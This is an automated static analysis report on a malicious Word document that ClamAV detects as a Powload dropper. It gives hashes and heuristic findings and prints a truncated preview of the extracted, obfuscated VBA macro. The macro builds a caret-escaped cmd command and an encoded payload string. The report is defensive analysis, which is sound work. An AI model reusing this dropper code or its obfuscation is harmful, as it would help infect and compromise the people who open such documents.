Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 984c49fda112dda5…

MALICIOUS

Office (OLE)

83.4 KB Created: 2018-08-29 04:11:00 Authoring application: Microsoft Office Word First seen: 2020-04-06
MD5: 32a4bbf15c9ec2184510b0a0fa5c7ecf SHA-1: 87594fc3dc29e4e62a9a2abc8c5468162e8033ab SHA-256: 984c49fda112dda53cd00dae650b747bad823faf1e8dc5140fc3834ff4a31e5b
242 Risk Score

Heuristics 7

  • ClamAV: Doc.Dropper.Powload-6665713-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6665713-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10951 bytes
SHA-256: be58349c516503363f3812655b9560926726e9088d5463dd66e2eda976b6491a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "drFIsELsAojF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nvBmKkjw"
Function kMYCL()

On _
Error _
Resume _
Next
Hour bLPiRD / SSZTJ
   Hour 91922 / QUiqr
   Hour VIsGz / JZDAaH * UwdvsS * RRGza
lCcUWj = "md /V" + ":O" + "N/C" + Chr(0 + 5 + 0 + 4 + 25) + "^s" + "e^t ch^"
Hour 15974 / knMjwN / tzwtd / 39411
   Hour YUmZGE * ufStE * jWkQC / URfJBU
   Hour 20298 * FOFMWZ
   Hour DSoca / jQXzQ / 67794 * pDHWPc
   Hour 97226 / XGXlVX
PjVWOzh = "g^S==^" + "=^AA" + "g" + "A^A^" + "IA" + "^AC" + "^AgAA" + "^I^AA" + "C^A^g" + "^AAIA" + "^AC^" + "A"
Hour iDPPGv / zSMaW
   Hour 33468 * kmqTo
   Hour 90707 * VPRfv * 68293 / FuKVc
djEVCtCIh = "g" + "AA^IAAC" + "^A^gAA" + "IAACAg^" + "AAIA^" + "0HA^" + "9" + "B^w^e^" + "A^g" + "^GAj^" + "B^A^dA" + "^E"
Hour 86666 * pjNOln
   Hour 90523 * orWop
   Hour 60286 / lXNDv / JZwVF / SHhJcn
jijiXY = "^G^A^j^" + "BQ" + "^fAs^" + "DArBQ^" + "YAU^G^" + "Ay^BgY" + "^A"
Hour 88788 / GUqYK
   Hour 89468 * qWJOXI * rXcfEI * 328
IMnCrhO = "sD^" + "AN^" + "B^" + "g^Q" + "^Ac^F^A" + "kA" + "^A" + "^I^A^" + "0" + "^GA^l" + "B^AdA" + "^kE^A" + "t^A"
kMYCL = lCcUWj + PjVWOzh + djEVCtCIh + jijiXY + IMnCrhO
   Hour wfrOFH / fdPkuu
   Hour 76154 * 29712 * wJlsRi / wSjrpL
End Function
Function aUUvUjfhjaa()

On _
Error _
Resume _
Next
Hour aNODS * 71028
   Hour 79106 / DzwEf / 95667 / RnXwp
   Hour 43534 * ttDzdi
hBznp = "^" + "Q" + "ZA^s" + "G" + "AvB^g" + "^d^" + "A" + "4G^AJ" + "B^w"
Hour 46120 * TjZMbL / OJXoiz * 79666
riRVUR = "^OAk" + "CAN^" + "B^" + "g^QAc" + "FAk^A^" + "AIAw" + "C^AvBge" + "A^I^FA" + "k^A^AK^" + "A^U^G^"
Hour zCNGW / QuBzra
   Hour SwpVGK * wBIRaN
   Hour 52249 / fJJuSc / 73534 * EkuHJi
oKHuRS = "As^BQ^" + "a^A^" + "YE" + "^AkB^" + "QYA^8G" + "^As^" + "B^g^bAc" + "H^Av^"
Hour wEwpf * hXLKI
   Hour 21243 / fcSIP / KvCKV * BBsOdK
   Hour 52748 * HQizZd * FiUcN / JLLiCw
BqwZI = "BAR" + "A^4C^AG" + "B" + "w" + "V^A^EE" + "AkAw^e^" + "Ak^H"
Hour 49710 * NSRXMz / GazPCk * hROlv
   Hour 35286 / rRIJT * YlRUf * PAqsF
FAuuZS = "^" + "AyB^A^d" + "^A^sH" + "A^pA^" + "w" + "dA^0" + "E^AxB^" + "A^JA^" + "AC^A^uB" + "^Q^aAAC" + "^Av^B^" + "ge" + "^A"
Hour 99082 * avKYpP
   Hour kYMzRm / 63026 * wburL * azPCjQ
   Hour 48800 / qSZqcD * 58799 * OvsRbi
   Hour IsjjM * 80488
   Hour fuXiqh / VfkTVh
RCLLQMPO = "IF^" + "Ak^A^" + "AKAgG" + "AjB" + "QYAU^G"
Hour 12651 / zhVwq
   Hour rXHjtc / UHlbo * 63313 * kjaPu
KPjil = "A^yBw^" + "b^AYGA" + "7A^wJAU" + "GA^4BQ" + "^ZA" + "^4C^An" + "A^w^" + "KA^o^H" + "^ArBA" + "c^A^QC"
Hour DSwWt * RtzCvs * YrCjSD * iijGZ
   Hour CNoYso * 35652 * 23985 / YicLLT
   Hour zuivG * pUpnX
KRVXYMLTQ = "ArAwJ^" + "AwF" + "AnA" + "w^KAM^" + "GA" + "^p" + "BAb^A" + "^IGA1" + "^B^" + "A" + "cA^o^D"
aUUvUjfhjaa = hBznp + riRVUR + oKHuRS + BqwZI + FAuuZS + RCLLQMPO + KPjil + KRVXYMLTQ
   Hour 80108 * tQUzOG
   Hour 6987 / apKhOZ
   Hour 64104 / FWATu * 16804 * 42530
   Hour BDCPJ / cCUqHO
End Function
Function PsHipAL()

On _
Error _
Resume _
Next
Hour QpKVQ * PNbaLz * MYVPd * SmLiIz
   Hour 1158 / rpzRot * 35745 / QpvUzO
   Hour iQIvZ * TQUBTE
   Hour 30713 / IwRjtR
   Hour 29996 / IpIYs * JziibL / OPcOn
iKchszqQL = "^A2" + "B" + "^gb^A^" + "U^G" + "^A^kA^" + "Q" + "^PA" + "0^EAC" + "^B^" + "wVA^Q" + "C^A" + "7^Aw^J"
Hour RZjcE * 34572
   Hour 41224 / wnZNiO * QbbrA * oFiBpq
   Hour 66467 * 86086
   Hour 57366 / jEahcT
   Hour 42565 * sYWmbu
QAKvfmzEtw = "A^" + "A" + "^" + "DA3A^" + "QMA" + "cCAg"
Hour 71561 * 56671 / CcEbAD * cikmj
   Hour tcmCoG * QszXEf / 10858 * GQArfY
zbajWvz = "^AQ^P^A" + "^A" + "CA6" + "^B^wa^A" + "A^HAk^A" + "wOA^kC^" + "An^AA" + "QAcC" + "^A^oAA^" + "d^AkG^A" + "s^B^Ac^" + "A^M^F" + "^AuA^w^"
Hour qQGOqJ / ldWpr
   Hour bzVDa / MVOpl * 88932 / XhsDoi
   Hour 88155 / iaVkAn
   Hour 41479 / 31778
HsqjPUDF = "J^" + "AQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.